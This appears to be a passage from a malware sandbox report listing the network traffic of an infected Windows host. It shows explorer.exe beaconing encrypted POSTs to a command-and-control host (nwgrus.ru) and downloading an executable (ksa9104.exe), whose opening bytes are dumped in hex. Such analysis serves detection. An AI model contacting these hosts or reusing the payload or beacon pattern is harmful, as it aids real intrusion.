6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49901	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:21.895740032 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://juflamsakvad.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 318 Host: nwgrus.ru
Oct 12, 2024 23:28:21.895754099 CEST	318	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 2b 34 b0 ba Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu+4OoA2OUA!A@FqR+5$jKU:%*INR$j\|A-2!hd^)UXH,m>#
Oct 12, 2024 23:28:23.271878958 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49908	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:23.281369925 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://omekhnsmgqeu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 362 Host: nwgrus.ru
Oct 12, 2024 23:28:23.281558990 CEST	362	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 31 5e ca 95 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu1^OkiPH_VduuqZl\|H=!LH1^"ncq;T14]&JL8d+F-sz}kP@QlTV4
Oct 12, 2024 23:28:24.646559000 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49918	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:24.654222012 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nkkmigjawaaknrre.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 335 Host: nwgrus.ru
Oct 12, 2024 23:28:24.654232979 CEST	335	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 20 01 d7 80 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[*k,vu S{LWp5sP3O$ }3,6KyT7C"GYy@8_)O$i[Ns}MYHI7
Oct 12, 2024 23:28:26.024338961 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49929	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:26.037432909 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ewehlvglopwca.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 129 Host: nwgrus.ru
Oct 12, 2024 23:28:26.037461042 CEST	129	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 61 2a a1 a8 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[+k,vua*wQSPIp\P~>,9@Yjn(
Oct 12, 2024 23:28:27.541810036 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50039	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:29:36.300379992 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gnpoohklywxdvf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 291 Host: nwgrus.ru
Oct 12, 2024 23:29:36.300434113 CEST	291	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7b 32 fc 85 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vu{2~De]rf*Pb KD v\,F@0UW@CL``@:CmK:e!h>MGT3$WJ_0C3\A4W<?
Oct 12, 2024 23:29:37.672319889 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:29:37 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50040	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:29:43.644726992 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yaiqkdhqwmycp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 358 Host: nwgrus.ru
Oct 12, 2024 23:29:43.644790888 CEST	358	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 78 0b f1 8a Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vuxZ<[pEcqC4l4?q^,_#D,UUsY.!sU^CykPa5`c3;,;01oe&Asn<51R
Oct 12, 2024 23:29:45.032691002 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:29:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50041	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:29:51.693173885 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yrsmvamryedsmns.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 225 Host: nwgrus.ru
Oct 12, 2024 23:29:51.693207979 CEST	225	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 42 f1 8b Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vu1BS=ibYdY:4HOyxLb>!JUH"Qav;Z-t8Q_w(ajE!+
Oct 12, 2024 23:29:53.060389996 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:29:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50042	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:30:01.781599045 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vdkygqlrtijypkc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 190 Host: nwgrus.ru
Oct 12, 2024 23:30:01.781599045 CEST	190	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7b 06 ef e8 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vu{}La~#VmB{2c`8~n(PW3*-RFBMf(v#9uOJ
Oct 12, 2024 23:30:03.156392097 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:30:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	57093	190.220.21.28	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:30:18.609090090 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://blhloseiscjcafeh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 265 Host: nwgrus.ru
Oct 12, 2024 23:30:18.609113932 CEST	265	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 32 05 af b5 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vu2GSkQsLKPH=-x>2ff$.Eg(IE= .0ILs<Qz0?X-rSi=-}y_SY{
Oct 12, 2024 23:30:20.228813887 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:30:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	57094	190.220.21.28	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:30:32.180901051 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ficvdttvkapihqjd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 342 Host: nwgrus.ru
Oct 12, 2024 23:30:32.180929899 CEST	342	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 32 0a c6 a9 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vu2TfM:hSxvc1K3g'7D:6#efxN3<v:/VgT!(',gtgnAF@v6aJV
Oct 12, 2024 23:30:33.635618925 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:30:33 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	57095	190.220.21.28	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:30:45.462446928 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rydhygdypun.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 140 Host: nwgrus.ru
Oct 12, 2024 23:30:45.462476015 CEST	140	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 57 03 f8 b8 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vuWa4vFS\|PT'%ja@iXuv\K%[b~
Oct 12, 2024 23:30:46.931045055 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:30:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	57096	190.220.21.28	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:30:59.558944941 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tasohhqhxavd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 299 Host: nwgrus.ru
Oct 12, 2024 23:30:59.558969975 CEST	299	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 62 01 b2 9d Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vubFxm `~Kfv'0n9lI1IcXO:Vs?\|mSXP:Q$f:1+?(/~M}!tlf{(<M>
Oct 12, 2024 23:31:01.015340090 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:31:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49817	23.145.40.164	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 21:28:09 UTC	162	OUT	GET /ksa9104.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 23.145.40.164
2024-10-12 21:28:10 UTC	327	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 21:28:10 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff Last-Modified: Sat, 12 Oct 2024 21:00:02 GMT ETag: "3b800-6244de32f9971" Accept-Ranges: bytes Content-Length: 243712 Connection: close Content-Type: application/x-msdos-program
2024-10-12 21:28:10 UTC	7865	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 98 e1 fc 79 dc 80 92 2a dc 80 92 2a dc 80 92 2a c2 d2 16 2a c7 80 92 2a c2 d2 07 2a cc 80 92 2a c2 d2 11 2a 96 80 92 2a fb 46 e9 2a d9 80 92 2a dc 80 93 2a b2 80 92 2a c2 d2 18 2a dd 80 92 2a c2 d2 06 2a dd 80 92 2a c2 d2 03 2a dd 80 92 2a 52 69 63 68 dc 80 92 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 83 69 6a 64 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$y*******F*******RichPELijd
2024-10-12 21:28:10 UTC	8000	IN	Data Raw: 83 c4 0c 85 c0 74 0f 33 c0 50 50 50 50 50 e8 91 13 00 00 83 c4 14 56 e8 7b 2d 00 00 40 59 83 f8 3c 76 38 56 e8 6e 2d 00 00 83 ee 3b 03 c6 6a 03 b9 5c ba 41 00 68 74 77 41 00 2b c8 51 50 e8 9c 2c 00 00 83 c4 14 85 c0 74 11 33 f6 56 56 56 56 56 e8 4e 13 00 00 83 c4 14 eb 02 33 f6 68 70 77 41 00 53 57 e8 02 2c 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 2a 13 00 00 83 c4 14 8b 45 fc ff 34 c5 ac a2 41 00 53 57 e8 dd 2b 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 05 13 00 00 83 c4 14 68 10 20 01 00 68 48 77 41 00 57 e8 50 2a 00 00 83 c4 0c eb 32 6a f4 ff 15 04 71 41 00 8b d8 3b de 74 24 83 fb ff 74 1f 6a 00 8d 45 f8 50 8d 34 fd ac a2 41 00 ff 36 e8 b9 2c 00 00 59 50 ff 36 53 ff 15 00 71 41 00 5f 5e 5b c9 c3 6a 03 e8 95 2d 00 00 59 83 f8 01 74 15 6a 03 e8 88 Data Ascii: t3PPPPPV{-@Y<v8Vn-;j\AhtwA+QP,t3VVVVVN3hpwASW,tVVVVVE4ASW+tVVVVVh hHwAWP2jqA;t$tjEP4A6,YP6SqA_^[j-Ytj
